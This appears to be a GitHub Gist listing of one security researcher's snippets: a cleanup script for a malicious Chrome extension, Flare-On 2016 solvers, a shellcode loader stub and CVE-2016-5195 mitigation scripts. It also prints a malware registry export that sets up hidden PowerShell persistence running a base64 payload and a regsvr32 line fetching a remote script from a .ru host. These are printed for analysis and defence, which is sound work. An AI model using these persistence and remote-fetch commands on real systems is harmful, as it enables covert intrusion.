Levis Nickaster (levisre)

@echo off
IF EXIST "%USERPROFILE%\AppData\Local\Google" (
    ECHO "Checking Chrome"
    CD /D "%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\Extensions"
    IF EXIST "ldobpmmlhhamdbpcipmehcibdlkoliah" (
        ECHO "Found Malicious Extension in %COMPUTERNAME%. Removing..."
        REM /s is needed: RMDIR /q alone refuses to remove a non-empty extension folder
        RMDIR /s /q "ldobpmmlhhamdbpcipmehcibdlkoliah"
    ) ELSE (
        ECHO "SAFE!"
    )
)
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"iCloudPhotos"="C:\\Program Files\\Common Files\\Apple\\Internet Services\\iCloudPhotos.exe"
"iCloudServices"="C:\\Program Files\\Common Files\\Apple\\Internet Services\\iCloudServices.exe"
"UniKey"="C:\\Program Files\\UniKey\\UniKeyNT.exe"
"{C3A46F5D-381E-4E87-83B8-E06D4A32AD32}"="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\MTBLHVGZMZY').PSphLsFbvEgBoa)));"
"Skype"="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" /minimized /regrun"
"COM+"="regsvr32 /s /n /u /i:http://server2.bjdnxbgp3.ru/setup.xml scrobj.dll"
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\MTBLHVGZMZY]
"PSphLsFbvEgBoa"="JFpwR2l5RkRKWnJsID0gJ01UQkxIVkdaTVpZJzsgDQokUU1VRlNESFZCSlVZTUJIR0NMID0gJ3s2QTUyNjZBMy1DNEJGLTQ5N0EtODBBQy01NzMwN0YzMzRGNTh9JzsNCiRDREFUUk9RQVVCQ1FGVFJQWFVZID0gJ3tCRjBFQThCRS1FNTNGLTQ5M0MtQjhCNy01MjkzMzQ5QzE5RDV9JzsNCkZ1bmN0aW9uIE1DTkZJSExNRERBRUV7DQoJUGFyYW0oW1BhcmFtZXRlciggUG9zaXRpb24gPSAwLCBNYW5kYXRvcnkgPSAkdHJ1ZSApXVtCeXRlW11dJFRJWVVETExWUEVOSEFPS1YsW1BhcmFtZXRlcihQb3NpdGlvbiA9IDEsIE1hbmRhdG9yeSA9ICR0cnVlKV1bQnl0ZVtdXSRNRFFGTVBaVElVKQ0KCVtCeXRlW11dJGsgPSBOZXctT2JqZWN0IEJ5dGVbXSAyNTY7DQoJW0J5dGVbXV0kcyA9IE5ldy1PYmplY3QgQnl0ZVtdIDI1NjsNCglmb3IgKCRpID0gMDsgJGkgLWx0IDI1NjsgJGkrKyl7DQoJCSRzWyRpXSA9IFtCeXRlXSRpOw0KCQkka1skaV0gPSAkTURRRk1QWlRJVVskaSAlICRNRFFGTVBaVElVLkxlbmd0aF07DQoJfQ0KCSRwID0gMDsNCglmb3IgKCRpID0gMDsgJGkgLWx0IDI1NjsgJGkrKyl7DQoJCSRwID0gKCRwICsgJHNbJGldICsgJGtbJGldKSAlIDI1NjsNCgkJJHNbJGldLCRzWyRwXSA9ICRzWyRwXSwkc1skaV07DQoJfQ0KCSRpID0gMDskcCA9IDA7DQoJZm9yICgkYyA9IDA7ICRjIC1sdCAkVElZVURMTFZQRU5
levisre / Flareon_2016_Chall6.py
Created November 11, 2016 03:26
Flare-on 2016 Challenge 6 Solver
import hashlib
def solver(win_msg):
    tmp = "312a232f272e27313162322e372548"
    stuffs = [67,
              139,
              119,
              165,
              232,
              86,
levisre / Flareon_2016_Chall8.py
Created November 11, 2016 03:21
Flare-on 2016 Challenge 8 Solver
# Both tables are consumed back to front, hence the [::-1] on each.
xorTable = [0xC5,0x38,0xE1,0x4A,0x1B,0x0C,0x1A,0x46,0x46,0x0A,0x96,0x29,0x73,0x73,0xA4,0x69,0x03,0x00,0x1B,0xA8,0xF8,0xB8,0x24,0x16,0xD6,0x09,0xCB][::-1]
encodedFlag = [0x8F,0xBC,0xDF,0x23,0x27,0x49,0x34,0x61,0x2F,0xF7,0x8E,0x34,0x67,0x97,0xAB,0x06,0x62,0x69,0xD6,0x7D,0x2F,0xF2,0x1C,0xA3,0xB0,0xAF][::-1]
# Each flag byte is the encoded byte XORed with two adjacent table entries;
# the decoded string is reversed again to restore the original order.
print(''.join(chr((xorTable[i] ^ xorTable[i+1]) ^ encodedFlag[i]) for i in range(len(encodedFlag)))[::-1])
levisre / Flareon_2016_Chall7_Bruteforce.py
Created November 11, 2016 02:57
Flare-on 2016 Challenge 7 brute-forcer to recover the original hash table
# Flare-on 2016 Challenge 7 hash table brute-forcer
# Note: this is not a SHA1 brute-forcer.
# It prints out every candidate value that satisfies the algorithm in the binary.
# The correct hash table is the first one that has 0x3C in the first position.
# You can recheck it.
hextable = [0x03, 0x72, 0xD7, 0xE5, 0x03, 0xAB, 0xE0, 0xD4, 0x9F, 0xB0, 0xAE, 0x4E, 0x9D, 0x4A, 0x97, 0xAE, 0xE7, 0xEB, 0x42, 0xEF, 0xB0, 0x80, 0x8F, 0x49, 0x9F, 0x1E, 0x28, 0xED, 0x7E, 0x42, 0x80, 0xBC, 0x14, 0xA7, 0x53, 0xA6, 0x0A, 0xA1, 0xDE, 0x43, 0xEC, 0x65, 0xF0, 0x3A, 0x67, 0x66, 0x3C, 0x4A, 0xE7, 0x69, 0xBB, 0x24, 0x25, 0x47, 0x57, 0x2E, 0x59, 0x26, 0x0A, 0x36, 0x95, 0xC4, 0x44, 0xD3, 0xFD, 0x85, 0xB0, 0x47, 0x35, 0xA6, 0x47, 0xBC, 0x83, 0x94, 0xEF, 0x03, 0x6C, 0x73, 0x05, 0xAC, 0xB2, 0x8A, 0xD0, 0x20, 0x9E, 0x7D, 0x18, 0xD4, 0xA6, 0x21, 0xEA, 0x46, 0x03, 0x9E, 0x4D, 0x5F, 0xC9, 0x2E, 0x20, 0xC0, 0xF0, 0x81, 0x17, 0x40, 0x0C, 0x09, 0x5C, 0x57, 0xE4, 0x86, 0x72, 0x05, 0x60, 0x1D, 0x0B, 0x43, 0x5D, 0x4A, 0x34, 0x85, 0x53, 0x10, 0xC
levisre / Flareon_2016_chall4.c
Created November 11, 2016 02:50
Flare-on 2016 Level 4 Solver
/*
Flare-on 2016 Challenge 4 Solver
By Levis Nickaster.
Note: put the DLL file in the same folder before running the compiled exe.
*/
#include <windows.h>
#include <stdio.h>
#define DLL_NAME "flareon2016challenge.dll"
levisre / ShellcodeLoader.c
Created November 11, 2016 02:46
Simple shellcode loader written in C. The shellcode must be in raw binary form.
#include <stdio.h>
#include <stdlib.h>
// Enable cross compiling: mmap on Linux, VirtualAlloc on Windows/MinGW
#ifdef __linux__
#include <sys/mman.h>
#elif defined(_WIN32) || defined(__MINGW32__)
#include <windows.h>
#endif
levisre / get_package.sh
Last active October 27, 2016 10:22
Bulk-crawl and fetch links to the packages needed to mitigate CVE-2016-5195 with SystemTap on CentOS
#!/bin/sh
#####################################################################
# Get packages for CVE-2016-5195 mitigation with SystemTap           #
# NOTE: IN SOME CASES IT DOESN'T WORK WITH CentOS 5                   #
# Good for bulk download and fixing systems with various kernel versions #
# Written by Levis Nickaster                                          #
#####################################################################
# get kernel version and Linux architecture
# Usage: ./get_info.sh <kernel_version> (i686|x86_x64)
levisre / cve-2016-5195_mitigation.sh
Created October 26, 2016 07:21
Use SystemTap with a script to mitigate CVE-2016-5195 (for CentOS vX.X)
#!/bin/sh
###################################
# CVE-2016-5195 Mitigation Script #
###################################
#LINUX_ARCH=$(uname -m)
#KERNEL_VER=$(uname -r)
#NOTE: RUN AS ROOT, MUST BE CONNECTED TO THE INTERNET
echo "Removing unused kernel-devel..."